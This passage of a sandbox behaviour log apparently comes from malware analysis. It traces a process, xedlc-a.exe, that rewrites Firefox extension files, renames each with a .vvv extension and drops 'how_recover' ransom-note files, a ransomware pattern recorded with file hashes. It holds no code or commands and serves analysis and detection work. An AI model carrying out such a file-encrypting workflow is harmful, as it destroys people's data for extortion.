50917.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50918.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50919.            ads:
50920.          fid (ads:): 281474976765892
50921.          ntstatus: 0x0
50922.          CreateOptions: 0x0
50923.        file:
50924.          timestamp: 72686
50925.          mode: rename
50926.          sequenceNumber: 1035
50927.          filesize: 20334
50928.          md5sum: 1ce612d9b1a3f15eebd0f2012d8b901f
50929.          sha1sum: b33e755531741122dcebeb0dc22386de29ab6a4a
50930.          processinfo:
50931.            pid: 1056
50932.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50933.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50934.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\components\harness.js
50935.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\components\harness.js.vvv
50936.            ads:
50937.          fid (ads:): 281474976765892
50938.          ntstatus: 0x0
50939.          CreateOptions: 0x0
50940.        file:
50941.          timestamp: 72700
50942.          mode: created
50943.          sequenceNumber: 1036
50944.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\components\how_recover+utm.txt
50945.          processinfo:
50946.            pid: 1056
50947.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50948.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50949.            ads:
50950.          fid (ads:): 281474976778329
50951.          ntstatus: 0x0
50952.          CreateOptions: 0x60
50953.        file:
50954.          timestamp: 72707
50955.          mode: close
50956.          sequenceNumber: 1037
50957.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\components\how_recover+utm.txt
50958.          filesize: 2682
50959.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
50960.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
50961.          processinfo:
50962.            pid: 1056
50963.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50964.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50965.            ads:
50966.          fid (ads:): 281474976778329
50967.          ntstatus: 0x0
50968.          CreateOptions: 0x0
50969.        file:
50970.          timestamp: 72730
50971.          mode: created
50972.          sequenceNumber: 1038
50973.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\components\how_recover+utm.html
50974.          processinfo:
50975.            pid: 1056
50976.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50977.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50978.            ads:
50979.          fid (ads:): 281474976778330
50980.          ntstatus: 0x0
50981.          CreateOptions: 0x60
50982.        file:
50983.          timestamp: 72737
50984.          mode: close
50985.          sequenceNumber: 1039
50986.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\components\how_recover+utm.html
50987.          filesize: 9495
50988.          md5sum: 95f596a25dff51b6af2042b1bbe02985
50989.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
50990.          processinfo:
50991.            pid: 1056
50992.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
50993.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
50994.            ads:
50995.          fid (ads:): 281474976778330
50996.          ntstatus: 0x0
50997.          CreateOptions: 0x0
50998.        file:
50999.          timestamp: 72805
51000.          mode: open
51001.          sequenceNumber: 1040
51002.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-data\test-page-worker.js
51003.          filesize: 905
51004.          processinfo:
51005.            pid: 1056
51006.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51007.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51008.            ads:
51009.          fid (ads:): 562949953476270
51010.          ntstatus: 0x0
51011.          CreateOptions: 0x60
51012.        file:
51013.          timestamp: 72814
51014.          mode: close
51015.          sequenceNumber: 1041
51016.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-data\test-page-worker.js
51017.          filesize: 1326
51018.          md5sum: 0e353739fad6a16b3f960e8d2fe30d5b
51019.          sha1sum: 3f323b39ec56d8cbee1a2d9930c7cd91b794b31b
51020.          processinfo:
51021.            pid: 1056
51022.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51023.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51024.            ads:
51025.          fid (ads:): 562949953476270
51026.          ntstatus: 0x0
51027.          CreateOptions: 0x0
51028.        file:
51029.          timestamp: 72826
51030.          mode: rename
51031.          sequenceNumber: 1042
51032.          filesize: 1326
51033.          md5sum: 0e353739fad6a16b3f960e8d2fe30d5b
51034.          sha1sum: 3f323b39ec56d8cbee1a2d9930c7cd91b794b31b
51035.          processinfo:
51036.            pid: 1056
51037.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51038.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51039.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-data\test-page-worker.js
51040.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-data\test-page-worker.js.vvv
51041.            ads:
51042.          fid (ads:): 562949953476270
51043.          ntstatus: 0x0
51044.          CreateOptions: 0x0
51045.        file:
51046.          timestamp: 72838
51047.          mode: created
51048.          sequenceNumber: 1043
51049.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-data\how_recover+utm.txt
51050.          processinfo:
51051.            pid: 1056
51052.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51053.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51054.            ads:
51055.          fid (ads:): 281474976778331
51056.          ntstatus: 0x0
51057.          CreateOptions: 0x60
51058.        file:
51059.          timestamp: 72846
51060.          mode: close
51061.          sequenceNumber: 1044
51062.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-data\how_recover+utm.txt
51063.          filesize: 2682
51064.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
51065.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
51066.          processinfo:
51067.            pid: 1056
51068.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51069.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51070.            ads:
51071.          fid (ads:): 281474976778331
51072.          ntstatus: 0x0
51073.          CreateOptions: 0x0
51074.        file:
51075.          timestamp: 72855
51076.          mode: created
51077.          sequenceNumber: 1045
51078.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-data\how_recover+utm.html
51079.          processinfo:
51080.            pid: 1056
51081.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51082.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51083.            ads:
51084.          fid (ads:): 281474976778332
51085.          ntstatus: 0x0
51086.          CreateOptions: 0x60
51087.        file:
51088.          timestamp: 72863
51089.          mode: close
51090.          sequenceNumber: 1046
51091.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-data\how_recover+utm.html
51092.          filesize: 9495
51093.          md5sum: 95f596a25dff51b6af2042b1bbe02985
51094.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
51095.          processinfo:
51096.            pid: 1056
51097.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51098.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51099.            ads:
51100.          fid (ads:): 281474976778332
51101.          ntstatus: 0x0
51102.          CreateOptions: 0x0
51103.        file:
51104.          timestamp: 72873
51105.          mode: open
51106.          sequenceNumber: 1047
51107.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\clipboard.js
51108.          filesize: 7688
51109.          processinfo:
51110.            pid: 1056
51111.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51112.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51113.            ads:
51114.          fid (ads:): 281474976765868
51115.          ntstatus: 0x0
51116.          CreateOptions: 0x60
51117.        file:
51118.          timestamp: 73152
51119.          mode: close
51120.          sequenceNumber: 1048
51121.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\clipboard.js
51122.          filesize: 8110
51123.          md5sum: c40b42787509a45c379254a7c2ebb3d9
51124.          sha1sum: 5039723739019fc9e582f1839765e132dce47029
51125.          processinfo:
51126.            pid: 1056
51127.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51128.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51129.            ads:
51130.          fid (ads:): 281474976765868
51131.          ntstatus: 0x0
51132.          CreateOptions: 0x0
51133.        file:
51134.          timestamp: 73217
51135.          mode: rename
51136.          sequenceNumber: 1049
51137.          filesize: 8110
51138.          md5sum: c40b42787509a45c379254a7c2ebb3d9
51139.          sha1sum: 5039723739019fc9e582f1839765e132dce47029
51140.          processinfo:
51141.            pid: 1056
51142.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51143.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51144.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\clipboard.js
51145.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\clipboard.js.vvv
51146.            ads:
51147.          fid (ads:): 281474976765868
51148.          ntstatus: 0x0
51149.          CreateOptions: 0x0
51150.        file:
51151.          timestamp: 73312
51152.          mode: open
51153.          sequenceNumber: 1050
51154.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\context-menu.js
51155.          filesize: 42249
51156.          processinfo:
51157.            pid: 1056
51158.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51159.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51160.            ads:
51161.          fid (ads:): 281474976765859
51162.          ntstatus: 0x0
51163.          CreateOptions: 0x60
51164.        file:
51165.          timestamp: 73647
51166.          mode: close
51167.          sequenceNumber: 1051
51168.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\context-menu.js
51169.          filesize: 42670
51170.          md5sum: e9ec3c26a2219c6d5605211327745010
51171.          sha1sum: c6aa6761bc99d517289ab1caac4558daac2e9e25
51172.          processinfo:
51173.            pid: 1056
51174.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51175.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51176.            ads:
51177.          fid (ads:): 281474976765859
51178.          ntstatus: 0x0
51179.          CreateOptions: 0x0
51180.        file:
51181.          timestamp: 73659
51182.          mode: rename
51183.          sequenceNumber: 1052
51184.          filesize: 42670
51185.          md5sum: e9ec3c26a2219c6d5605211327745010
51186.          sha1sum: c6aa6761bc99d517289ab1caac4558daac2e9e25
51187.          processinfo:
51188.            pid: 1056
51189.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51190.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51191.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\context-menu.js
51192.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\context-menu.js.vvv
51193.            ads:
51194.          fid (ads:): 281474976765859
51195.          ntstatus: 0x0
51196.          CreateOptions: 0x0
51197.        file:
51198.          timestamp: 73671
51199.          mode: open
51200.          sequenceNumber: 1053
51201.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\hotkeys.js
51202.          filesize: 2928
51203.          processinfo:
51204.            pid: 1056
51205.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51206.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51207.            ads:
51208.          fid (ads:): 281474976765897
51209.          ntstatus: 0x0
51210.          CreateOptions: 0x60
51211.        file:
51212.          timestamp: 73731
51213.          mode: close
51214.          sequenceNumber: 1054
51215.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\hotkeys.js
51216.          filesize: 3358
51217.          md5sum: f67a64cf42cc6da4603e913178821a41
51218.          sha1sum: 90dec1e983793443310d0a30689c42cc14fdb053
51219.          processinfo:
51220.            pid: 1056
51221.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51222.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51223.            ads:
51224.          fid (ads:): 281474976765897
51225.          ntstatus: 0x0
51226.          CreateOptions: 0x0
51227.        file:
51228.          timestamp: 73746
51229.          mode: rename
51230.          sequenceNumber: 1055
51231.          filesize: 3358
51232.          md5sum: f67a64cf42cc6da4603e913178821a41
51233.          sha1sum: 90dec1e983793443310d0a30689c42cc14fdb053
51234.          processinfo:
51235.            pid: 1056
51236.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51237.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51238.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\hotkeys.js
51239.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\hotkeys.js.vvv
51240.            ads:
51241.          fid (ads:): 281474976765897
51242.          ntstatus: 0x0
51243.          CreateOptions: 0x0
51244.        file:
51245.          timestamp: 73758
51246.          mode: open
51247.          sequenceNumber: 1056
51248.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\notifications.js
51249.          filesize: 3970
51250.          processinfo:
51251.            pid: 1056
51252.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51253.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51254.            ads:
51255.          fid (ads:): 562949953476260
51256.          ntstatus: 0x0
51257.          CreateOptions: 0x60
51258.        file:
51259.          timestamp: 73824
51260.          mode: close
51261.          sequenceNumber: 1057
51262.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\notifications.js
51263.          filesize: 4398
51264.          md5sum: f47c7e8e486aad56c891a4b50479ba57
51265.          sha1sum: cd686544fca5dae975e7280d2e279c7bf8b30022
51266.          processinfo:
51267.            pid: 1056
51268.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51269.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51270.            ads:
51271.          fid (ads:): 562949953476260
51272.          ntstatus: 0x0
51273.          CreateOptions: 0x0
51274.        file:
51275.          timestamp: 73838
51276.          mode: rename
51277.          sequenceNumber: 1058
51278.          filesize: 4398
51279.          md5sum: f47c7e8e486aad56c891a4b50479ba57
51280.          sha1sum: cd686544fca5dae975e7280d2e279c7bf8b30022
51281.          processinfo:
51282.            pid: 1056
51283.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51284.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51285.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\notifications.js
51286.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\notifications.js.vvv
51287.            ads:
51288.          fid (ads:): 562949953476260
51289.          ntstatus: 0x0
51290.          CreateOptions: 0x0
51291.        file:
51292.          timestamp: 73850
51293.          mode: open
51294.          sequenceNumber: 1059
51295.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\page-mod.js
51296.          filesize: 8111
51297.          processinfo:
51298.            pid: 1056
51299.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51300.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51301.            ads:
51302.          fid (ads:): 281474976765882
51303.          ntstatus: 0x0
51304.          CreateOptions: 0x60
51305.        file:
51306.          timestamp: 74191
51307.          mode: close
51308.          sequenceNumber: 1060
51309.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\page-mod.js
51310.          filesize: 8526
51311.          md5sum: a044dd82559a53a5a37973ab9348ae8e
51312.          sha1sum: af4e46496d99d82d9ae283ac1b7a69c016982524
51313.          processinfo:
51314.            pid: 1056
51315.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51316.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51317.            ads:
51318.          fid (ads:): 281474976765882
51319.          ntstatus: 0x0
51320.          CreateOptions: 0x0
51321.        file:
51322.          timestamp: 74384
51323.          mode: rename
51324.          sequenceNumber: 1061
51325.          filesize: 8526
51326.          md5sum: a044dd82559a53a5a37973ab9348ae8e
51327.          sha1sum: af4e46496d99d82d9ae283ac1b7a69c016982524
51328.          processinfo:
51329.            pid: 1056
51330.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51331.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51332.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\page-mod.js
51333.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\page-mod.js.vvv
51334.            ads:
51335.          fid (ads:): 281474976765882
51336.          ntstatus: 0x0
51337.          CreateOptions: 0x0
51338.        apicall:
51339.          timestamp: 74393
51340.          repeat: 80
51341.          sequenceNumber: 1062
51342.          processinfo:
51343.            pid: 1056
51344.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51345.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51346.          dllname: kernel32.dll
51347.          apiname: Sleep
51348.          address: 0x0041ed5b
51349.        file:
51350.          timestamp: 74584
51351.          mode: open
51352.          sequenceNumber: 1063
51353.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\page-worker.js
51354.          filesize: 3813
51355.          processinfo:
51356.            pid: 1056
51357.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51358.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51359.            ads:
51360.          fid (ads:): 562949953476259
51361.          ntstatus: 0x0
51362.          CreateOptions: 0x60
51363.        file:
51364.          timestamp: 74595
51365.          mode: close
51366.          sequenceNumber: 1064
51367.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\page-worker.js
51368.          filesize: 4238
51369.          md5sum: 4d3b9a457453bd4f209883e11d7f737d
51370.          sha1sum: cadf7640ff46ef9f99689173579f83080272e104
51371.          processinfo:
51372.            pid: 1056
51373.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51374.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51375.            ads:
51376.          fid (ads:): 562949953476259
51377.          ntstatus: 0x0
51378.          CreateOptions: 0x0
51379.        file:
51380.          timestamp: 74611
51381.          mode: rename
51382.          sequenceNumber: 1065
51383.          filesize: 4238
51384.          md5sum: 4d3b9a457453bd4f209883e11d7f737d
51385.          sha1sum: cadf7640ff46ef9f99689173579f83080272e104
51386.          processinfo:
51387.            pid: 1056
51388.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51389.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51390.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\page-worker.js
51391.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\page-worker.js.vvv
51392.            ads:
51393.          fid (ads:): 562949953476259
51394.          ntstatus: 0x0
51395.          CreateOptions: 0x0
51396.        file:
51397.          timestamp: 74624
51398.          mode: open
51399.          sequenceNumber: 1066
51400.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\panel.js
51401.          filesize: 13423
51402.          processinfo:
51403.            pid: 1056
51404.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51405.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51406.            ads:
51407.          fid (ads:): 281474976765910
51408.          ntstatus: 0x0
51409.          CreateOptions: 0x60
51410.        file:
51411.          timestamp: 74782
51412.          mode: close
51413.          sequenceNumber: 1067
51414.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\panel.js
51415.          filesize: 13838
51416.          md5sum: 114ea72d1c604ff1784741956120dc55
51417.          sha1sum: 88e01f7f24bd79355d8a6a53442edc2e3f24952f
51418.          processinfo:
51419.            pid: 1056
51420.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51421.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51422.            ads:
51423.          fid (ads:): 281474976765910
51424.          ntstatus: 0x0
51425.          CreateOptions: 0x0
51426.        file:
51427.          timestamp: 74794
51428.          mode: rename
51429.          sequenceNumber: 1068
51430.          filesize: 13838
51431.          md5sum: 114ea72d1c604ff1784741956120dc55
51432.          sha1sum: 88e01f7f24bd79355d8a6a53442edc2e3f24952f
51433.          processinfo:
51434.            pid: 1056
51435.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51436.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51437.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\panel.js
51438.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\panel.js.vvv
51439.            ads:
51440.          fid (ads:): 281474976765910
51441.          ntstatus: 0x0
51442.          CreateOptions: 0x0
51443.        file:
51444.          timestamp: 74806
51445.          mode: open
51446.          sequenceNumber: 1069
51447.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\passwords.js
51448.          filesize: 3318
51449.          processinfo:
51450.            pid: 1056
51451.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51452.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51453.            ads:
51454.          fid (ads:): 281474976765912
51455.          ntstatus: 0x0
51456.          CreateOptions: 0x60
51457.        file:
51458.          timestamp: 75014
51459.          mode: close
51460.          sequenceNumber: 1070
51461.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\passwords.js
51462.          filesize: 3742
51463.          md5sum: 1118d141da726b1103b8dd3ea0123710
51464.          sha1sum: 82c9aad18bdbcb055d3846a2ce3d6f0be5219c0c
51465.          processinfo:
51466.            pid: 1056
51467.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51468.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51469.            ads:
51470.          fid (ads:): 281474976765912
51471.          ntstatus: 0x0
51472.          CreateOptions: 0x0
51473.        file:
51474.          timestamp: 75061
51475.          mode: rename
51476.          sequenceNumber: 1071
51477.          filesize: 3742
51478.          md5sum: 1118d141da726b1103b8dd3ea0123710
51479.          sha1sum: 82c9aad18bdbcb055d3846a2ce3d6f0be5219c0c
51480.          processinfo:
51481.            pid: 1056
51482.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
51483.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
51484.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\passwords.js
